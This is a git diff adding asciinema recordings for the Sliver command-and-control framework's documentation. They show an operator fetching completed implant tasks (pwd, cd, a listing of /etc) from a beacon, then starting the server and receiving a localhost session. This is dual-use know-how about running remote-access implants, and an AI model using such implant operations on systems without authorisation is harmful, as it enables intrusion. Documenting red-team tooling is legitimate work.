"\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[45.145196, "o", "t\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[45.147005, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[45.228832, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[45.229719, "o", "\u001b[6n"] +[45.231611, "o", "ta\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C"] +[45.232616, "o", "\u001b[107D\u001b[33C\u001b[?25h"] +[45.337194, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[45.350984, "o", "tas\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[45.35236, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[45.436014, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[45.447126, "o", "task\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[45.44806, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[45.525114, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[45.530111, "o", "\u001b[1m\u001b[32mtasks\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[31C\u001b[107D\u001b[36C\u001b[?25h"] +[45.718031, "o", "\u001b[1 q"] +[45.765101, "o", "\u001b[1 q"] +[45.765417, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[45.768441, "o", "\u001b[1m\u001b[32mtasks \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[37D\u001b[31C\u001b[107D\u001b[37C\u001b[?25h"] +[46.15152, "o", "\u001b[?25l\u001b[107D"] +[46.153902, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[46.159136, "o", "\u001b[1m\u001b[32mtasks \u001b[39m\u001b[22mf\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[46.160933, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[38D\u001b[31C\u001b[107D\u001b[38C\u001b[?25h"] +[46.170095, "o", "\u001b[?25l\u001b[107D"] +[46.171199, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[46.175794, "o", "\u001b[1m\u001b[32mtasks \u001b[39m\u001b[22mfe\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[39D\u001b[31C\u001b[107D\u001b[39C\u001b[?25h"] +[46.321279, "o", "\u001b[1 q"] +[46.353862, "o", "\u001b[1 q\u001b[?25l\u001b[107D"] +[46.354607, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[46.358819, "o", "\u001b[1m\u001b[32mtasks \u001b[39m\u001b[22mfetch \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[46.359617, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[43D\u001b[31C\u001b[107D\u001b[43C\u001b[?25h"] +[46.596519, "o", "\u001b[43D\u001b[31C\u001b[6n"] +[46.600517, "o", "\u001b[107D\u001b[43C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[46.632537, "o", "\u001b7\u001b[?25l\u001b8"] +[46.634912, "o", "\u001b[0G\u001b[2K"] +[46.635856, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a beacon task:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> 3b339091 PwdReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b[0;39m 415074fa CdReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b[0;39m 3fb0a3ef LsReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b7"] +[46.637993, "o", "\u001b[1A\u001b[0G\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[47.960431, "o", "\u001b8\u001b[?25h\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a beacon task:\u001b[0m\u001b[0;36m 3b339091 PwdReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n"] +[47.962262, "o", "\u001b[1A\r\u001b[2K"] +[47.985035, "o", "+------------------------------------------------------+\r\n| \u001b[1mBeacon Task\u001b[0m | 3b339091-cb42-4463-a504-dabac76180cd |\r\n+---------------+--------------------------------------+\r\n| State | ✅ \u001b[1m\u001b[32mCompleted\u001b[0m |\r\n| Description | PwdReq |\r\n| Created | Wed, 01 May 2024 18:59:41 UTC |\r\n| Sent | Wed, 01 May 2024 19:00:06 UTC |\r\n| Completed | Wed, 01 May 2024 19:00:06 UTC |\r\n| Request Size | 15 B |\r\n| Response Size | 7 B |\r\n+------------------------------------------------------+\r\n"] +[47.986381, "o", "\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0m/root\r\n\r\n"] +[48.011542, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[48.012525, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[48.015167, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[48.01553, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[49.092126, "o", "\u001b[?25l"] +[49.099106, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[49.105441, "o", "\u001b[1m\u001b[32mtasks \u001b[39m\u001b[22mfetch \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[49.107241, "o", "\u001b[107D\u001b[1A\u001b[43D\u001b[31C\u001b[107D\u001b[43C\u001b[?25h"] +[49.430117, "o", "\u001b[43D\u001b[31C\u001b[6n"] +[49.44589, "o", "\u001b[107D\u001b[43C\u001b[0J\u001b[107D\r\r\n"] +[49.447373, "o", "\u001b[0 q\r\n"] +[49.470053, "o", "\u001b7\u001b[?25l\u001b8\u001b[0G"] +[49.471459, "o", "\u001b[2K"] +[49.474782, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a beacon task:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> 3b339091 PwdReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b[0;39m 415074fa CdReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b[0;39m 3fb0a3ef LsReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b7"] +[49.476183, "o", "\u001b[1A\u001b[0G\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[49.971565, "o", "\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[49.977007, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a beacon task:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;39m 3b339091 PwdReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b[0;1;36m> 415074fa CdReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b[0;39m 3fb0a3ef LsReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b7\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[50.26957, "o", "\u001b8"] +[50.27137, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[50.272803, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a beacon task:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;39m 3b339091 PwdReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b[0;39m 415074fa CdReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b[0;1;36m> 3fb0a3ef LsReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b7"] +[50.275392, "o", "\u001b[1A\u001b[0G"] +[50.809228, "o", "\u001b8\u001b[?25h"] +[50.810289, "o", "\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[50.814212, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a beacon task:\u001b[0m\u001b[0;36m 3fb0a3ef LsReq \u001b[1m\u001b[32mcompleted\u001b[0m \u001b[0m\r\n\u001b[1A\r\u001b[2K"] +[50.826934, "o", "+------------------------------------------------------+\r\n| \u001b[1mBeacon Task\u001b[0m | 3fb0a3ef-b35f-4c5f-911e-4457be4efd9d |\r\n+---------------+--------------------------------------+\r\n| State | ✅ \u001b[1m\u001b[32mCompleted\u001b[0m |\r\n| Description | LsReq |\r\n| Created | Wed, 01 May 2024 18:59:46 UTC |\r\n| Sent | Wed, 01 May 2024 19:00:06 UTC |\r\n| Completed | Wed, 01 May 2024 19:00:06 UTC |\r\n| Request Size | 18 B |\r\n| Response Size | 3.7 KiB |\r\n+------------------------------------------------------+\r\n\r\n"] +[50.828139, "o", "/etc (81 items, 260.8 KiB)\r\n==========================\r\n"] +[50.833346, "o", "-rw------- root:root .pwd.lock 0 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root adduser.conf 3.0 KiB Tue Apr 25 14:03:14 +0000 2023\r\ndrwxr-xr-x root:root alternatives Tue Apr 25 14:06:16 +0000 2023\r\ndrwxr-xr-x root:root apt Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root bash.bashrc 2.3 KiB Thu Jan 06 16:23:33 +0000 2022\r\n-rw-r--r-- root:root bindresvport.blacklist 367 B Wed Dec 16 11:04:55 +0000 2020\r\ndrwxr-xr-x root:root ca-certificates Wed May 01 13:50:41 +0000 2024\r\n-rw-r--r-- root:root ca-certificates.conf 5.8 KiB Wed May 01 13:50:51 +0000 2024\r\ndrwxr-xr-x root:root cloud Tue Apr 25 14:06:23 +0000 2023\r\ndrwxr-xr-x root:root cron.d Tue Apr 25 14:06"] +[50.833809, "o", ":19 +0000 2023\r\ndrwxr-xr-x root:root cron.daily Tue Apr 25 14:06:17 +0000 2023\r\n-rw-r--r-- root:root debconf.conf 2.9 KiB Sun Feb 20 14:42:49 +0000 2022\r\n-rw-r--r-- root:root debian_version 13 B Sun Aug 22 17:00:00 +0000 2021\r\ndrwxr-xr-x root:root default Tue Apr 25 14:06:18 +0000 2023\r\n-rw-r--r-- root:root deluser.conf 604 B Sat Sep 15 22:14:19 +0000 2018\r\ndrwxr-xr-x root:root dpkg Tue Apr 25 14:06:16 +0000 2023\r\n-rw-r--r-- root:root e2scrub.conf 685 B Sat Jan 08 20:02:36 +0000 2022\r\n-rw-r--r-- root:root environment 106 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root fstab 37 B Tue Apr 25 14:03:08 +0000 2023\r\n-rw-r--r-- root:root gai.conf 2.5 KiB "] +[50.833945, "o", "Thu Feb 03 05:27:54 +0000 2022\r\n-rw-r--r-- root:root group 446 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r----- root:shadow gshadow 374 B Tue Apr 25 14:03:14 +0000 2023\r\ndrwxr-xr-x root:root gss Mon Feb 21 20:05:20 +0000 2022\r\n-rw-r--r-- root:root host.conf 92 B Fri Oct 15 10:06:05 +0000 2021\r\n-rw-r--r-- root:root hostname 13 B Wed May 01 11:41:24 +0000 2024\r\n-rw-r--r-- root:root hosts 174 B Wed May 01 11:41:24 +0000 2024\r\ndrwxr-xr-x root:root init.d Tue Apr 25 14:06:09 +0000 2023\r\n-rw-r--r-- root:root inputrc 1.7 KiB Thu Jan 06 16:26:54 +0000 2022\r\n-rw-r--r-- root:root issue 26 B Thu Feb 16 16:02:32 +0000 2023\r\n-rw-r--r-- root:root issue.net "] +[50.834106, "o", " 19 B Thu Feb 16 16:02:32 +0000 2023\r\ndrwxr-xr-x root:root kernel Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root ld.so.cache 6.6 KiB Wed May 01 13:51:02 +0000 2024\r\n-rw-r--r-- root:root ld.so.conf 34 B Wed Dec 16 11:04:55 +0000 2020\r\ndrwxr-xr-x root:root ld.so.conf.d Tue Apr 25 14:06:17 +0000 2023\r\ndrwxr-xr-x root:root ldap Wed May 01 13:50:43 +0000 2024\r\n-rw-r--r-- root:root legal 267 B Fri Oct 15 10:06:05 +0000 2021\r\n-rw-r--r-- root:root libaudit.conf 191 B Thu Mar 17 17:50:40 +0000 2022\r\ndrwxr-xr-x root:root logcheck Wed May 01 13:50:43 +0000 2024\r\n-rw-r--r-- root:root login.defs 10.5 KiB Thu Nov 11 15:42:38 +0000 2021\r\ndrwxr-xr-x root:root logrotate.d "] +[50.834201, "o", " Tue Apr 25 14:06:17 +0000 2023\r\n-rw-r--r-- root:root lsb-release 104 B Thu Feb 16 16:02:32 +0000 2023\r\n-rw-r--r-- root:root machine-id 0 B Tue Apr 25 14:06:19 +0000 2023\r\n-rw-r--r-- root:root mime.types 70.3 KiB Mon Mar 21 09:12:23 +0000 2022\r\n-rw-r--r-- root:root mke2fs.conf 744 B Sat Jan 08 20:02:36 +0000 2022\r\nLrwxrwxrwx root:root mtab -> /proc/19246/mounts 12 B Wed May 01 11:41:24 +0000 2024\r\n-rw-r--r-- root:root netconfig 767 B Thu Mar 24 16:13:48 +0000 2022\r\n-rw-r--r-- root:root networks 91 B Fri Oct 15 10:06:05 +0000 2021\r\n-rw-r--r-- root:root nsswitch.conf 494 B Wed Dec 16 11:04:55 +0000 2020\r\ndrwxr-xr-x root:root opt Tue Apr 25 14:03:08 +0000 2023\r\nLrwxrwxrwx root:root "] +[50.834272, "o", " os-release -> ../usr/lib/os-release 21 B Thu Feb 16 16:02:32 +0000 2023\r\n-rw-r--r-- root:root pam.conf 552 B Wed Aug 12 00:15:04 +0000 2020\r\ndrwxr-xr-x root:root pam.d Tue Apr 25 14:06:18 +0000 2023\r\n-rw-r--r-- root:root passwd 922 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root profile 582 B Fri Oct 15 10:06:05 +0000 2021\r\ndrwxr-xr-x root:root profile.d Tue Apr 25 14:06:16 +0000 2023\r\ndrwxr-xr-x root:root python3 Wed May 01 11:42:42 +0000 2024\r\ndrwxr-xr-x root:root python3.10 Wed May 01 11:42:32 +0000 2024\r\ndrwxr-xr-x root:root rc0.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc1.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr"] +[50.834339, "o", "-x root:root rc2.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc3.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc4.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc5.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc6.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rcS.d Tue Apr 25 14:03:13 +0000 2023\r\n-rw-r--r-- root:root resolv.conf 97 B Wed May 01 11:41:24 +0000 2024\r\nLrwxrwxrwx root:root rmt -> /usr/sbin/rmt-tar 13 B Wed Feb 15 15:45:50 +0000 2023\r\ndrwxr-xr-x root:root security Tue Apr 25 14:06:17 +0000 2023\r\ndrwxr-xr-x root:root selinux Tue Apr 25 14:05:13 +000"] +[50.834902, "o", "0 2023\r\n-rw-r----- root:shadow shadow 501 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root shells 142 B Wed May 01 12:11:33 +0000 2024\r\ndrwxr-xr-x root:root skel Tue Apr 25 14:03:24 +0000 2023\r\ndrwxr-xr-x root:root ssl Wed May 01 13:50:43 +0000 2024\r\n-rw-r--r-- root:root subgid 0 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root subuid 0 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root sysctl.conf 2.3 KiB Fri Feb 25 11:32:20 +0000 2022\r\ndrwxr-xr-x root:root sysctl.d Tue Apr 25 14:05:58 +0000 2023\r\ndrwxr-xr-x root:root systemd Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root terminfo Tue Apr "] +[50.834977, "o", "25 14:05:50 +0000 2023\r\ndrwxr-xr-x root:root update-motd.d Tue Apr 25 14:06:16 +0000 2023\r\n-rw-r--r-- root:root xattr.conf 681 B Wed Mar 23 09:41:49 +0000 2022\r\n\r\n\r\n"] +[50.850839, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[50.850978, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[50.851034, "o", "\u001b[6n"] +[50.853243, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[52.794065, "o", "\u001b[?25l"] +[52.795694, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[52.811379, "o", "b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[52.811839, "o", "\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[52.880998, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[52.883904, "o", "ba\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[53.023473, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.02698, "o", "bac\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[53.141757, "o", "\u001b[?25l"] +[53.142137, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[53.144837, "o", "\u001b[6n"] +[53.148545, "o", "back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[53.149522, "o", "\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[53.277628, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.287967, "o", "backg\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[31C\u001b[107D\u001b[36C\u001b[?25h"] +[53.328989, "o", "\u001b[?25l\u001b[107D"] +[53.329901, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.332245, "o", "backgr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[53.333298, "o", "\u001b[107D\u001b[1A\u001b[37D\u001b[31C\u001b[107D\u001b[37C\u001b[?25h"] +[53.387784, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[53.388886, "o", "\u001b[6n"] +[53.390433, "o", "backgro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[53.390674, "o", "\u001b[1A\u001b[38D\u001b[31C\u001b[107D\u001b[38C\u001b[?25h"] +[53.446915, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.449749, "o", "backgrou\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[39D\u001b[31C\u001b[107D\u001b[39C\u001b[?25h"] +[53.491784, "o", "\u001b[?25l\u001b[107D"] +[53.492463, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.495225, "o", "backgroun\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[53.495792, "o", "\u001b[1A\u001b[40D\u001b[31C\u001b[107D\u001b[40C\u001b[?25h"] +[53.550209, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.554691, "o", "\u001b[1m\u001b[32mbackground\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[53.554816, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[41D\u001b[31C\u001b[107D\u001b[41C\u001b[?25h"] +[53.729192, "o", "\u001b[41D\u001b[31C\u001b[6n"] +[53.741159, "o", "\u001b[107D\u001b[41C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[53.769632, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBackground ...\r\n\r\n"] +[53.780366, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[53.780801, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[53.782338, "o", "\u001b[6n"] +[53.784762, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C"] +[53.785937, "o", "\u001b[?25h"] +[54.215505, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[54.216141, "o", "\u001b[6n"] +[54.21991, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[54.2212, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[54.379919, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[54.380426, "o", "\u001b[6n"] +[54.390339, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[54.538062, "o", "\u001b[?25l"] +[54.539033, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[54.542374, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[54.633954, "o", "\u001b[?25l\u001b[107D"] +[54.635551, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[54.639696, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[13D\u001b[9C"] +[54.639828, "o", "\u001b[107D\u001b[13C\u001b[?25h"] +[55.085057, "o", "\u001b[13D\u001b[9C"] +[55.085829, "o", "\u001b[6n"] +[55.098144, "o", "\u001b[107D\u001b[13C\u001b[0J\u001b[107D\r\r\n\u001b[0 q"] +[55.098526, "o", "\r\n"] +[55.123226, "o", "Exiting...\r\n"] +[55.14691, "o", "\u001b[?2004h"] +[55.147476, "o", "root@98df0494f659:~# "] +[56.321891, "o", "^C"] +[56.324025, "o", "\u001b[?2004l\r\u001b[?2004h"] +[56.331126, "o", "\u001b[?2004l\r\r\n\u001b[?2004hroot@98df0494f659:~# "] +[56.76656, "o", "\u001b[?2004l\r\r\n"] +[56.767344, "o", "exit\r\n"] diff --git a/docs/sliver-docs/public/asciinema/execute.cast b/docs/sliver-docs/public/asciinema/execute.cast new file mode 100644 index 0000000000..b4c30350d1 --- /dev/null +++ b/docs/sliver-docs/public/asciinema/execute.cast @@ -0,0 +1,307 @@ +{"version": 2, "width": 107, "height": 52, "timestamp": 1714577344, "env": {"SHELL": "/bin/bash", "TERM": "screen"}} +[0.1326, "o", "\u001b[?2004h"] +[0.140706, "o", "root@98df0494f659:~# "] +[0.710776, "o", "."] +[0.724207, "o", "/"] +[1.043813, "o", "s"] +[1.147166, "o", "l"] +[1.330001, "o", "i"] +[1.481599, "o", "v"] +[1.596179, "o", "e"] +[1.746669, "o", "r"] +[1.846813, "o", "-"] +[1.98099, "o", "s"] +[2.064556, "o", "e"] +[2.166834, "o", "r"] +[2.308631, "o", "ver "] +[2.734668, "o", "\r\n"] +[2.736753, "o", "\u001b[?2004l\r"] +[3.810137, "o", "\u001b[1m\u001b[37m\r\r\n.------..------..------..------..------..------.\r\r\n|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |\r\r\n| :/\\: || :/\\: || (\\/) || :(): || (\\/) || :(): |\r\r\n| :\\/: || (__) || :\\/: || ()() || :\\/: || ()() |\r\r\n| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|\r\r\n`------'`------'`------'`------'`------'`------'\r\r\n\u001b[0m\r\nAll hackers gain dash\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - 0b235b4d42d4eb75684825f5d5b30da71ec57d26 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n"] +[3.81282, "o", "\r\n"] +[3.840912, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.842733, "o", "\u001b[1 q"] +[3.844801, "o", "\u001b[?25l"] +[3.8449, "o", "\u001b[107D"] +[3.846077, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[3.848514, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[3.848844, "o", "\r\r\n\u001b[0K"] +[3.849682, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[6.306709, "o", "\u001b[9D\u001b[9C"] +[6.307527, "o", "\u001b[107D\u001b[0J\r\u001b[2K\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mSession e1bcdc51 CURRENT_RESIST - 127.0.0.1:59370 (98df0494f659) - linux/amd64 - Wed, 01 May 2024 15:29:11 UTC\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.309613, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[6.310035, "o", 